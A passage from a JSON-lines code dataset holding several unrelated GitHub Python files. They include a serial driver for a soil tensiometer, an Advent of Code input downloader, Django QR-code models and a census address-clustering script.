ser.write(F\"{message}\\r\".encode())\n ser.flush()\n\n @staticmethod\n def get_reply(ser:serial.Serial):\n '''\n Wrapper for serial read_until(), returns a string without \"\\\\r\"\n '''\n return ser.read_until(b\"\\r\").decode().rstrip()\n\n @staticmethod\n def ack_ok(ser:serial.Serial):\n '''\n Check if sensor returned OK, returns True or False\n '''\n ok_ack = UGTTensiometer.get_reply(ser)\n return ok_ack == \"OK\"\n\n @staticmethod\n def request_serial(ser:serial.Serial):\n '''\n Send get serial number command, need to open bus OPx first.\n '''\n UGTTensiometer.send_command(ser, \"GSN\")\n\n @staticmethod\n def request_bus_address(ser:serial.Serial, channel):\n '''\n Send get bus address command, need to open bus using OPx first.\n '''\n if channel < 1 or channel > 4:\n raise ValueError(\"Incorrect channel value\")\n UGTTensiometer.send_command(ser, F\"GAD{channel}\")\n\n @staticmethod\n def open_bus(ser:serial, bus_address):\n '''\n Send open bus command, returns True or False\n '''\n UGTTensiometer.send_command(ser, F\"OP{bus_address}\")\n return UGTTensiometer.ack_ok(ser)\n\n @staticmethod\n def get_raw(ser:serial.Serial):\n '''\n Send request measurement command, need to open bus first using OPx\n '''\n UGTTensiometer.send_command(ser, \"GN\")\n return UGTTensiometer.get_reply(ser)\n\n @staticmethod\n def change_channel_bus(ser:serial.Serial, channel, new_bus_address):\n '''\n Change bus address, Returns True if successfull.\n Need to open correct bus to FRT with OPx first.\n '''\n UGTTensiometer.send_command(ser, F\"SAD{channel} {new_bus_address}\")\n return UGTTensiometer.ack_ok\n\n @staticmethod\n def raw_to_celsius(digital_value: float):\n '''\n Convert measured temperature digital output to celsius\n '''\n if isinstance(digital_value, str):\n digital_value = float(digital_value)\n # return (digital_value - BIT_CONVERSION_FACTOR) / 320\n return (digital_value - UGT_CONVERSION_FACTOR_32768) / 100\n\n @staticmethod\n def raw_to_kpa(digital_value: float):\n '''\n Convert measured pressure digital output to kPa\n '''\n if isinstance(digital_value, str):\n digital_value = float(digital_value)\n return (((digital_value - BIT_CONVERSION_FACTOR) * UGT_CONVERSION_FACTOR_31 / UGT_CONVERSION_FACTOR_32768) - 1) * 100\n\n def attach(self, ser:serial.Serial):\n '''\n Reference a serial port for the tensiometer to communicate on.\n '''\n if not isinstance(ser, serial.Serial):\n raise TypeError(\"Tensiometer needs to be attached to a valid serial object\")\n self._ser = ser\n if self._ser.isOpen() is False:\n self._ser.open()\n\n @property\n def serial_number(self):\n '''\n Returns string representation of the\n '''\n return self._serial_number\n\n @serial_number.setter\n def serial_number(self, serial_number):\n '''\n Change temperature bus address\n '''\n if serial_number is not None and isinstance(serial_number, str):\n serial_number = serial_number.strip()\n self._serial_number = serial_number\n\n @property\n def temperature_bus_addr(self):\n '''\n Returns string representation of temperature bus address\n '''\n return str(self._temperature_bus_addr)\n\n @temperature_bus_addr.setter\n def temperature_bus_addr(self, address):\n '''\n Change temperature bus address\n '''\n if address is not None and isinstance(address, str):\n address = address.strip()\n self._temperature_bus_addr = address\n\n @property\n def pressure_bus_addr(self):\n '''\n Returns string representation of pressure bus address\n '''\n return str(self._pressure_bus_addr)\n\n @pressure_bus_addr.setter\n def pressure_bus_addr(self, address):\n '''\n Change pressure bus address\n '''\n if address is not None and isinstance(address, str):\n address = address.strip()\n self._pressure_bus_addr = address\n\n def update_temperature_bus_address(self):\n '''\n Gets and update the temperature bus address.\n '''\n if self._serial_number is None:\n raise RuntimeError(\"Device does not have a serial number\")\n if UGTTensiometer.open_bus(self._ser, self._serial_number):\n UGTTensiometer.request_bus_address(self._ser, CHANNEL_TEMPERATURE)\n address = UGTTensiometer.get_reply(self._ser)\n if address == \"\":\n return False\n self._temperature_bus_addr = address\n return True\n\n def update_pressure_bus_address(self):\n '''\n Gets and update the pressure bus address.\n '''\n if self._serial_number is None:\n raise RuntimeError(\"Device does not have a serial number\")\n if UGTTensiometer.open_bus(self._ser, self._serial_number):\n UGTTensiometer.request_bus_address(self._ser, CHANNEL_PRESSURE)\n address = UGTTensiometer.get_reply(self._ser)\n if address == \"\":\n return False\n self._pressure_bus_addr = address\n return True\n\n def get_temperature_raw(self):\n '''\n Get digital raw temperature reading from sensor\n '''\n\n if self._temperature_bus_addr is None:\n raise RuntimeError(\"Temperature bus address not set\")\n\n if UGTTensiometer.open_bus(self._ser, self._temperature_bus_addr) is False:\n raise RuntimeError(\"Unable to communicate with sensor\")\n\n return UGTTensiometer.get_raw(self._ser)\n\n def get_pressure_raw(self):\n '''\n Get digital raw pressure reading from sensor\n '''\n\n if self._pressure_bus_addr is None:\n raise RuntimeError(\"Pressure bus address not set\")\n\n if UGTTensiometer.open_bus(self._ser, self._pressure_bus_addr) is False:\n raise RuntimeError(\"Unable to communicate with sensor\")\n\n return UGTTensiometer.get_raw(self._ser)\n\n def get_temperature(self):\n '''\n Get temperature reading from tensiometer in celsius.\n '''\n value = UGTTensiometer.get_temperature_raw(self)\n return UGTTensiometer.raw_to_celsius(value)\n\n def get_pressure(self):\n '''\n Get pressure reading from tensiometer in kPa.\n '''\n value = UGTTensiometer.get_pressure_raw(self)\n return UGTTensiometer.raw_to_kpa(value)\n\n def get_suction(self, temperature:float, pressure:float):\n '''\n Return the tension as calculated from tensiometer calibrated info.\n '''\n p_ref = calculate_temperature_compensated_reference_pressure(temperature=temperature,\n p_0=self._p_0, c_t1=self._c_t1, c_t2=self._c_t2)\n return p_ref - pressure\n\n\ndef serial_session(serial_obj: serial):\n '''\n Serial session to interface with sensor\n '''\n while True:\n user_input = input(\"Command to send: \").strip().upper()\n if user_input in (\"X\", \"EXIT\"):\n break\n UGTTensiometer.send_command(serial_obj, user_input)\n time.sleep(0.1)\n while serial_obj.in_waiting:\n message = UGTTensiometer.get_reply(serial_obj)\n print(message)\n\n\ndef sample_single(tensiometer:UGTTensiometer, csv_file:TextIOWrapper=None):\n '''\n Main function single sampling of UGT tensiometer\n '''\n time_now_local_str = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n temperature_raw = tensiometer.get_temperature_raw() # temp in digital value\n temperature = UGTTensiometer.raw_to_celsius(temperature_raw) # temp in celsius\n pressure_raw = tensiometer.get_pressure_raw() # pressure in digital value\n pressure = UGTTensiometer.raw_to_kpa(pressure_raw) # pressure in kPa\n suction = tensiometer.get_suction(temperature, pressure)\n\n print(F\"Temperature: {temperature_raw} (Digital), {temperature} (C)\")\n print(F\"Pressure: {pressure_raw} (Digital), {pressure} (kPa)\")\n print(F\"Suction: {suction} (kPa)\")\n\n if SAVE_TO_CSV and csv_file is not None:\n csv_file.write(F\"{time_now_local_str},{temperature_raw},{pressure_raw},{temperature},{pressure},{suction}\\n\")\n # csv_file.flush()\n\n\ndef sample_loop(tensiometer:UGTTensiometer, csv_file:TextIOWrapper=None):\n '''\n Prompts user for sampling interval in seconds to sample at specified intervals.\n '''\n interval = int(input(\"Time interval between sampling in seconds: \"))\n print(F\"Sampling interval set at {interval} seconds\")\n while True:\n sample_single(tensiometer, csv_file)\n print(F\"{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())} - Waiting {interval} seconds\")\n time.sleep(interval)\n\n\nif __name__ == '__main__':\n ports = get_com_ports_list()\n print_ports_list(ports)\n\n user_port_selection = -1\n while(user_port_selection < 0 or user_port_selection >= len(ports)):\n user_port_selection = input(\"Enter a number: \").strip()\n\n if user_port_selection == \"r\":\n ports = get_com_ports_list()\n print_ports_list(ports)\n user_port_selection = -1\n elif user_port_selection == \"x\":\n exit()\n else:\n user_port_selection = int(user_port_selection)\n\n port_address = ports[user_port_selection].device\n\n tensiometer_comm = serial.Serial(port_address)\n UGTTensiometer.configure_serial(tensiometer_comm)\n\n try:\n # Create tensiometer object and update bus addresses for the sensor\n tensiometer = UGTTensiometer(ser=tensiometer_comm, serial_number=\"202000024\", \\\n t1_coeff=-0.1718, t2_coeff=28.7730, p0_ref=1925.25)\n # tensiometer = UGTTensiometer(ser=tensiometer_comm, serial_number=\"20180005\", \\\n # t1_coeff=-0.1173, t2_coeff=24.595, p0_ref=1462.1)\n tensiometer.update_temperature_bus_address()\n tensiometer.update_pressure_bus_address()\n\n # serial_session(tensiometer_comm)\n if SAVE_TO_CSV:\n csv_file = open_csv(CSV_FILE_PATH)\n else:\n csv_file = None\n\n # sample_single(tensiometer, csv_file)\n sample_loop(tensiometer, csv_file)\n\n except KeyboardInterrupt:\n print(\"\")\n except Exception:\n traceback.print_exc()\n # print(sys.exc_info()[0])\n finally:\n # Cleaning up\n if tensiometer_comm is not None and tensiometer_comm.isOpen():\n tensiometer_comm.close()\n try:\n if SAVE_TO_CSV:\n # csv_file.write(\"\\r\\n\")\n if not csv_file.closed:\n csv_file.close()\n except (NameError):\n pass\n","repo_name":"ltan10/UGTTensiometer","sub_path":"tensiometer.py","file_name":"tensiometer.py","file_ext":"py","file_size_in_byte":14802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33361960259","text":"import pathlib\nimport urllib.request\n\nfrom . import utils\n\n\ndef get_input(root_path: pathlib.Path, year: int, day: int, session: str) -> int:\n # Download data from server\n url: str = f\"https://adventofcode.com/{year}/day/{day}/input\"\n request = urllib.request.Request(\n url,\n headers={\n \"Cookie\": f\"session={session}\"\n })\n response = urllib.request.urlopen(request)\n if response.status != 200:\n utils.print_error_msg(\n 'Error while trying to connect to the \\\"Advent of Code\\\" webpage. Check the input parameters of the script and make sure that the session key is valid.')\n return 1\n # Check if the selected puzzle folder structure exists\n input_path = root_path / f\"puzzles/{year}/{day}/sources/input.txt\"\n if not input_path.is_file():\n utils.print_error_msg(\n 'Missing folder structure for the selected puzzle. Use \\\"add_day\\\" subcommand first.')\n return 1\n # Save into file\n with open(input_path, \"wb\") as f:\n f.write(response.read().strip())\n\n print(\n f'Input data for puzzle {year} day {day} has been stored in {input_path.absolute()}.')\n return 0\n","repo_name":"Hekkfern/advent-of-code","sub_path":"scripts/internal/getinput_subcommand.py","file_name":"getinput_subcommand.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25872612804","text":"import qrcode\nfrom io import BytesIO\n\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.contrib.sites.models import Site\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.dispatch import receiver\n\nfrom user.models import User\nfrom voucher.models import Voucher\n\n\nclass QRCode(models.Model):\n \"\"\"\n Default QR code class\n \"\"\"\n\n qr_code = models.ImageField(\n _(\"QR code\"), upload_to=\"qr_codes\", blank=True, null=True\n )\n\n class Meta:\n abstract = True\n\n def create_code(self, data, filename=None):\n \"\"\"\n Create the QR Code\n data - data that needs to be encoded in the qr image\n \"\"\"\n qr = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=2,\n )\n qr.add_data(data)\n qr.make(fit=True)\n\n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\n\n buffer = BytesIO()\n img.save(buffer)\n filename = f\"{filename or str(self.pk)}.png\"\n file_buffer = InMemoryUploadedFile(\n buffer, None, filename, \"image/png\", len(buffer.getvalue()), None\n )\n self.qr_code.save(filename, file_buffer)\n\n\nclass UserQRCode(QRCode):\n \"\"\"\n Staff qr code\n \"\"\"\n\n user = models.OneToOneField(\n User,\n verbose_name=_(\"User\"),\n related_name=\"qr_code\",\n on_delete=models.CASCADE,\n )\n\n def __str__(self):\n return f\"{self.user} QR code [{self.pk}]\"\n\n class Meta:\n verbose_name = _(\"User QR code\")\n verbose_name_plural = _(\"User QR codes\")\n\n\nclass VoucherQRCode(QRCode):\n voucher = models.OneToOneField(\n Voucher,\n verbose_name=_(\"Voucher\"),\n related_name=\"qr_code\",\n on_delete=models.CASCADE,\n )\n qr_code = models.ImageField(\n _(\"QR Code\"), upload_to=\"vouchers/qr_codes\", blank=True, null=True\n )\n\n def __str__(self):\n return f\"{self.voucher} QR code [{self.pk}]\"\n\n class Meta:\n verbose_name = _(\"Voucher QR code\")\n verbose_name_plural = _(\"Voucher QR code\")\n\n\nclass SitesTracker(models.Model):\n original_domain = models.CharField(\n max_length=100,\n unique=True\n )\n site = models.ForeignKey(\n Site,\n on_delete=models.CASCADE\n )\n\n\n@receiver(post_save, sender=Site)\ndef recreate_qr_codes(sender, instance, created, **kwargs):\n if created or not SitesTracker.objects.filter(site=instance).exists():\n SitesTracker.objects.create(original_domain=instance.domain, site=instance)\n\n tracker = SitesTracker.objects.filter(site=instance).first()\n\n if tracker and tracker.original_domain != instance.domain:\n tracker.original_domain = instance.domain\n tracker.save()\n for user in User.objects.all():\n user.qr_code.qr_code.delete()\n user.qr_code.delete()\n user.create_qr_code()\n\n for voucher in Voucher.objects.all():\n voucher.qr_code.qr_code.delete()\n voucher.qr_code.delete()\n voucher.create_qr_code()","repo_name":"Tynianov/coffee_shop","sub_path":"qr_code/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20759630459","text":"import pygame\n\n\n'''this class is used to handle the file \"keys.txt\" which contains the current keyboard keys that the player chooses\nin setting class. the keys are read in game initialization so the player can choose to change keys as he see fits.\nit is used by gameManage class and settings class.'''\nclass FileHandler:\n def __init__(self):\n self.__default_keys = [1073741906, 1073741903, 1073741904, 32, 97, 115]\n self.__wordList = [\"Advance\", \"Turn Right\", \"Turn Left\", \"Shoot Fireball\", \"Shoot Flamethrower\",\n \"Shoot Rocket\"]\n\n def get_words_list(self):\n return self.__wordList\n\n '''this function writes to keys.txt the saved keys for each action. thus the playing keys are updates'''\n def writeToFile(self, wordsList, currentKeys):\n with open(\"keys.txt\", \"w\") as file:\n file.write(\"**** DO NOT CHANGE THIS FILE!!!!!!****\\n\")\n file.write(\"keys:\\n\")\n\n for i in range(len(wordsList)):\n line = f\"{wordsList[i]} = {currentKeys[i]}\\n\"\n file.write(line)\n\n '''this function reads from the file the current keys, used on initialization, for now it remains public as\n it should be used on game initialization to get the playing keys. it might move to \"main\" class\n (or future name - logicSupport)'''\n\n def readFromFile(self):\n settings = []\n\n try:\n with open(\"keys.txt\", 'r') as file:\n lines = file.readlines()\n\n # Skip the first line (header)\n for line in lines[2:]:\n line = line.strip() # Remove leading/trailing whitespaces\n if line:\n key, value = line.split(' = ')\n settings.append(int(value))\n except FileNotFoundError:\n self.writeToFile(self.__wordList, self.__default_keys)\n return self.__default_keys\n\n\n return settings","repo_name":"amit9676/Ladybug","sub_path":"fileHandlerClass.py","file_name":"fileHandlerClass.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12370975747","text":"\nimport os\nimport mjdb\nimport config\nimport pandas as pd\nimport common as cmn\nfrom sqlalchemy import create_engine\n\nDIRECTORY = \"C:\\PETL\\Benefitpoint\"\nENGINE = create_engine(config.config('config.ini','postgres_alchemy')['url'])\n\ncfgs = [\n {\n 'file':'bp_splits.csv',\n 'target':'splits',\n 'targetSchema':'benefitpoint',\n 'targetCols':'office,department,account,account_id,acct_primary_sales_lead,acct_primary_service_lead,billing_carrier,plan_type,plan_name,plan_office,plan_department,plan_id,policy_group_nbr,plan_eff_date,plan_renewal_date,split_eff_date,payee_name,commission_pct,commission_split_type,override_pct,override_split_type,bonus_pct,bonus_split_type,bob_pct'\n }\n]\n\ndef main():\n for cfg in cfgs:\n if os.path.exists(os.path.join(DIRECTORY,cfg['file'])):\n df = cmn.csv_dataframe(os.path.join(DIRECTORY,cfg['file']), None, targetCols=cfg['targetCols'].split(','))\n df.to_sql(cfg['target'], ENGINE, cfg['targetSchema'], 'replace', False)\n cmn.move_file(DIRECTORY, cfg['file'], 'archive')\n\nif __name__ == '__main__':\n main()","repo_name":"jbeckom/python-mjdw","sub_path":"splitsImport.py","file_name":"splitsImport.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41453816416","text":"from pytube import YouTube\r\nfrom pytube import Playlist\r\n\r\ndownlodaFolder = input(\"enter the path for download: \")\r\nurl = input(\"enter youtube url: \")\r\n\r\nplaylist = Playlist(url)\r\n\r\nfor video in playlist:\r\n print(video)\r\n yt = YouTube(video)\r\n video_select = yt.streams.get_by_itag(22)\r\n video_select.download(downlodaFolder, yt.title + '.mp4')","repo_name":"LSH137/youtube_downloder","sub_path":"youtube_downloader.py","file_name":"youtube_downloader.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1383818612","text":"import datetime\nfrom datetime import date,time,timedelta\nimport csv\nimport random\nimport webbrowser\ndata = {}\nsport = ['football','basketball']\nfood = ['tea','burger','fries']\ntyp = []\nran = []\nwith open(\"bigdata.csv\") as q:\n dataing = csv.DictReader(q, delimiter=',')\n for row in dataing:\n # ran.append(row['data'])\n ran.append(row['tag'])\n r = random.choice(ran)\n while r == 'unknown':\n r = random.choice(ran)\n print('Try searching for ' + random.choice(ran))\na = input('How do you feel ? ')\n\n\nif a in sport:\n typ.append('sport')\nelif a in food:\n typ.append('food')\nelse:\n typ.append('unknown')\n\n\nwith open('bigdata.csv','a+') as e:\n write = csv.writer(e, delimiter=',')\n write.writerow([a,datetime.datetime.now().time(),typ[0]])\n typ = []\n\nwebbrowser.open('www.google.com/#q=' + str(a))","repo_name":"dafaqSTEVEN/Kivy","sub_path":"bigdata.py","file_name":"bigdata.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22870572895","text":"#=======*Stack*======Using LifoQueue class from queue module========\n\nimport queue\nstack=queue.LifoQueue(maxsize=1)\n#=======Push Operation==================\ndef push():\n\tif not stack.full():\n\t\telement=int(input(\"Enter Element to push\"))\n\t\tstack.put_nowait(element)\n\t\tprint(element,\" added into stack\")\n\telse:\n\t\tprint(\"Stack size=\",stack.qsize())\n\t\tprint(\"Stack is Full Can't Push\")\n\n#=======Pop Operation==================\ndef pop_element():\n\tif stack.empty():\n\t\tprint(\"Stack is Empty,can't remove\")\n\telse:\n\t\te=stack.get_nowait()\n\t\tprint(e,\"removed from stack\")\n\n#=======Top of Stack==================\ndef top_element():\n\tif stack.empty():\n\t\tprint(\"Stack is Empty\")\n\telse:\n\t\tprint(\"Top of Stack=\",stack[-1])\n\n#=======show stack Operation==================\ndef display():\n\tprint(stack)\n\t\nwhile True:\n\tprint(\"Select Operation: \\n1.add \\n2.remove \\n3.top of stack \\n4.show \\n5.Quit :-\")\n\tch=int(input())\n\tif(ch==1):\n\t\tpush()\n\telif(ch==2):\n\t\tpop_element()\n\telif(ch==3):\n\t\ttop_element()\n\telif(ch==4):\n\t\tdisplay()\n\telse:\n\t\tbreak\n","repo_name":"ChouguleAnkita/Python-Data-Structure","sub_path":"Stack/stack_using_queueModule.py","file_name":"stack_using_queueModule.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20507970201","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 18 19:52:24 2022\n\n@author: onais\n\"\"\"\nimport sys\nsys.path.insert(0, '../dwm-refactor-v1/')\nimport DWM00_Driver as DWM\nimport pandas as pd\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom pyvis.network import Network\n\nimport re\nfrom tqdm import tqdm\nimport pandas as pd\nimport json \nimport numpy as np\n#DWM.DWM_Cluster(\"S2-parms.txt\")\n\n#Parsing 1st program\nAddress_4CAF50=open(\"SOG Clean Occupancy Data.txt\",\"r\")\nLines = Address_4CAF50.readlines()\nDF=[]\nii=0\ncount = 0\nFinalList=[]\nfileHandle = open('USAddressWordTable.txt', 'r')\nNamefileHandle = open('NamesWordTableOpt.txt', 'r')\nSplitWordTable = open('SplitWordTable.txt', 'r')\n\n# Strips the newline character\nCount=len(Lines)\nDF=pd.DataFrame()\nC=1\nCC=1\nJsonData={}\nAllAddress_Key_Value_As_MASK_Comp={}\nObservation=0\nTotal=0\ndataFinal={}\nNameListFinal=[]\nAddressListFinal=[]\nfor line in tqdm(Lines):\n line=line.strip(\"\\n\").split(\"|\")\n ID=line[0]\n line=line[1] .strip() \n Old_Address=line.strip()\n USAD_Conversion_Dict={\"1\":\"USAD_SNO\",\"2\":\"USAD_SPR\",\"3\":\"USAD_SNM\",\"4\":\"USAD_SFX\",\"5\":\"USAD_SPT\",\"6\":\"USAD_ANM\",\"7\":\"USAD_ANO\",\"8\":\"USAD_CTY\",\"9\":\"USAD_STA\",\"10\":\"USAD_ZIP\",\"11\":\"USAD_ZP4\",\"12\":\"USAD_BNM\",\"13\":\"USAD_BNO\",\"14\":\"USAD_RNM\"}\n \n USAD_Conversion_Dict_Detail={\"1\":\"USAD_SNO Street Number\",\"2\":\"USAD_SPR Street Pre-directional\",\"3\":\"USAD_SNM Street Name\",\"4\":\"USAD_SFX Street Suffix\",\"5\":\"USAD_SPT Street Post-directional\",\"6\":\"USAD_ANM Secondary Address Name\",\"7\":\"USAD_ANO Secondary Address Number\",\"8\":\"USAD_CTY City Name\",\"9\":\"USAD_STA State Name\",\"10\":\"USAD_ZIP Zip Code\",\"11\":\"USAD_ZP4 Zip 4 Code\",\"12\":\"USAD_BNM Box Name\",\"13\":\"USAD_BNO Box Number\",\"14\":\"USAD_RNM Route Name\"}\n\n \n List=USAD_Conversion_Dict.keys()\n FirstPhaseList=[]\n Address=re.sub(',',' ',line)\n Address=re.sub(' +', ' ',Address)\n Address=re.sub('[.]','',Address)\n #Address=re.sub('#','',Address) \n Address=Address.upper()\n AddressList = re.split(\"\\s|\\s,\\s \", Address)\n tmp1=0\n NameList=[]\n RevisedAddressList=[]\n SplitMask=\"\"\n for A in AddressList:\n FirstPhaseDict={}\n NResult=False\n try:\n Compare=A[0].isdigit()\n except:\n a=0\n if A==\",\":\n SplitMask+=\",\"\n elif Compare:\n SplitMask+=\"A\"\n else:\n NR=True\n for line in SplitWordTable:\n \n fields=line.split('|')\n if A==(fields[0]):\n SplitMask+=fields[1].strip()\n NR=False\n break\n if NR:\n SplitMask+=\"W\"\n SplitWordTable.seek(0)\n Name=\"\"\n indexSplit=0\n for m in range(len(SplitMask)):\n if SplitMask[m] in (\"W\",\"P\",\",\") :\n continue\n else:\n indexSplit=m\n break\n\n RevisedAddressList = AddressList[indexSplit:len(AddressList)]\n \n NameList = AddressList[0:indexSplit]\n \n if NameList[len(NameList)-1]==\",\":\n NameList.pop(len(NameList)-1)\n \n NameListFinal.append([ID,' '.join(NameList)])\n AddressListFinal.append([ID,' '.join(RevisedAddressList)])\nfile_n = open(\"FileN.txt\", \"w\")\n\nfor element in NameListFinal:\n file_n.write(element[0]+\"|\"+element[1])\n file_n.write(\"\\n\")\nfile_n.close()\n\nfile_a = open(\"FileA.txt\", \"w\")\n\nfor element in AddressListFinal:\n file_a.write(element[0]+\"|\"+element[1])\n file_a.write(\"\\n\")\nfile_a.close()\nDWM.DWM_Cluster(\"File_A_Parms.txt\")\n\nfile_Address=open(\"FileA-LinkIndex.txt\",\"r\")\nAddress_Cluster = file_Address.readlines()\nfile_a_r = open(\"SOG Clean Occupancy Data.txt\", \"r\")\n\nfile_a_r=file_a_r.readlines()\n\nfile_n_r = open(\"FileN.txt\", \"r\")\nLinesRead=file_n_r.readlines()\nClusters_With_ID=[]\nClusters=set()\nfor i in Address_Cluster:\n find_Address=i.split(\",\")\n Clusters_With_ID.append([find_Address[0].strip(),find_Address[1].strip()])\n if find_Address[1].strip()!=\"ClusterID\":\n Clusters.add(find_Address[1].strip())\ndel Clusters_With_ID [0]\nClusters_Dict={}\ni=1\nClusters=list(Clusters)\nClusters.sort(reverse=False)\nfor j in Clusters:\n Clusters_Dict[j]=\"C\"+str(i)\n i+=1\nt=1\nprint(Clusters_Dict)\nfile_a_w = open(\"SOG Clean Occupancy Data.txt\", \"w\")\ni=0\nfor k in Clusters_With_ID:\n Clusters_With_ID[i][1]=Clusters_Dict[Clusters_With_ID[i][1]]\n i+=1\nfor k in file_a_r:\n splitData=k.split(\"|\")\n n=0\n for l in Clusters_With_ID:\n if splitData[0]==Clusters_With_ID[n][0]:\n file_a_w.write(k.strip()+\"|\"+Clusters_With_ID[n][1])\n file_a_w.write(\"\\n\")\n break\n n+=1\nfile_n_r.close() \nfile_a_w.close() \nfile_n_w = open(\"FileNM.txt\", \"w\")\nfor k in LinesRead:\n splitData=k.split(\"|\")\n n=0\n for l in Clusters_With_ID:\n if splitData[0]==Clusters_With_ID[n][0]:\n file_n_w.write(k.strip()+\"|\"+Clusters_With_ID[n][1])\n file_n_w.write(\"\\n\")\n break\n n+=1\nfile_n_w.close()\n\n\nfile_n_r = open(\"FileNM.txt\", \"r\")\nLinesRead=file_n_r.readlines()\nfile_n_r.close()\nfile_n_w = open(\"FileNM.txt\", \"w\")\nfor k in LinesRead:\n splitData=k.split(\"|\")\n splitName=splitData[1].split(\" \")\n for o in splitName:\n file_n_w.write(o+\"|\"+splitData[2])\nfile_n_w.close()\n\nwith open('FileNM.txt') as fl:\n content = fl.read().split('\\n')\ncontent = set([line for line in content if line != ''])\ncontent = '\\n'.join(content)\nwith open('FileNM.txt', 'w') as fl:\n fl.writelines(content)\n\ncombining_centers=open(\"FileNM.txt\",\"r\")\nLinesRead=combining_centers.readlines()\nFinal_Cluster=[]\nfile_n_w = open(\"FileNM.txt\", \"w\")\nfor j in LinesRead:\n SplitW=j.split(\"|\")\n for p in LinesRead[1:len(LinesRead)-1]:\n SplitC=p.split(\"|\")\n if SplitW[0]==SplitC[0] and SplitW[1]!=SplitC[1]:\n Final_Cluster.append((SplitW[1].strip(),SplitC[1].strip()))\n \nout=list(set(map(tuple,map(sorted,Final_Cluster))))\nCluster_to_Cluster=[]\nwith open(\"FileNM.txt\",\"w\") as O:\n for k in out:\n O.writelines(k[0]+\",\"+k[1])\n O.writelines(\"\\n\")\n Cluster_to_Cluster.append([k[0],k[1]])\n \ng=Network(height='100%', width='100%',directed=True)\n \n\n\ng.show('example.html')\nopen_Cluster=open(\"FileNM.txt\",\"r\")\nlistcluster=open_Cluster.readlines()\nListFrom=[]\nListTo=[]\nedge_color=[]\n\nNodesCluster=set()\nfor m in listcluster:\n SplitX=m.split(\",\")\n NodesCluster.add(SplitX[0].strip())\n NodesCluster.add(SplitX[1].strip())\n \nfor i in NodesCluster:\n g.add_node(i,color='blue',title=i,label=i)\nNodesCluster.clear()\n\nfor m in listcluster:\n SplitX=m.split(\",\")\n ListFrom.append(SplitX[0].strip())\n ListTo.append(SplitX[1].strip())\n edge_color.append(10)\n g.add_edge(SplitX[0].strip(),SplitX[1].strip(),color='black',width=2,arrowStrikethrough=True)\n NodesCluster.add(SplitX[0].strip())\n NodesCluster.add(SplitX[1].strip())\n\n\nopen_Cluster.close()\nrangeo=set(ListFrom+ListTo)\nMap_File=open(\"SOG Clean Occupancy Data.txt\",\"r\")\nMap=Map_File.readlines()\nnode_color=[]\nfor k in range(len(rangeo)):\n node_color.append(\"#00ff00\")\nCluster_to_Nodes=[]\nfor k in Map:\n SplitX=k.split(\"|\")\n ListFrom.append(SplitX[2].strip())\n ListTo.append(SplitX[0].strip())\n g.add_node(SplitX[0].strip(),color='yellow',title=SplitX[0].strip(),label=SplitX[1].strip(),shape=\"ellipse\")\n g.add_edge(SplitX[2].strip(),SplitX[0].strip(),color='red',width=2)\n edge_color.append(10)\n node_color.append(\"#4CAF50\")\n Cluster_to_Nodes.append([SplitX[0].strip(),SplitX[2].strip(),SplitX[1].strip()])\nMap_File.close()\ndf = pd.DataFrame({ 'from':ListFrom, 'to':ListTo, 'value':edge_color})\n # C1,C2\n # C2,C3\n # C4,C5\n # C1,C3\n# Build your graph\n\nfor m in Cluster_to_Cluster:\n print(m)\n\n\n# G=nx.from_pandas_edgelist(df, 'from', 'to', create_using=nx.Graph() )\n# # Custom the nodes:\n# nx.draw(G, with_labels=True,node_color=node_color, edge_color=df['value'],cmap=plt.get_cmap('jet'),\n# node_size=700, node_shape=\"o\", alpha=0.8,font_size=8, font_color=\"black\", font_weight=\"bold\")\n\n# g.show('Graph.html')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"OnaisKhanMohammed/Census-Linking","sub_path":"TEMP_Graphpipeline.py","file_name":"TEMP_Graphpipeline.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25123229915","text":"# getting input from user\n\nname = input('what is your name? ')\nprint('Hi ' + name + ' welcome to the python3 world')\n\n# calculating the age of user\n\nbirth_year = input('when is your birthday? ' )\nage = 2019 - int(birth_year) # here we need to use int() to parse birth_year from string to integer\nprint(type(birth_year)) # type of birth_year, now you can undrestand why we need to parse it from strong to integer\nprint(type(age))\nprint(age)\n\n# long string \n\nemail = '''Dear pooya,\n\nthanks for your time, after careful consideration we are regret to inform you we can not move forward with your application.\n\nkind regards\nmars\n'''\n\nprint(email)","repo_name":"pouyapanahandeh/python3-ref","sub_path":"python-HR/appOne.py","file_name":"appOne.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11619107302","text":"import pandas as pd\nimport numpy as np\nfrom datetime import datetime, timedelta\n\n\n\n\ndef random_datetime(start, end):\n delta = end - start\n random_days = np.random.uniform(0, delta.days)\n random_seconds = np.random.uniform(0, 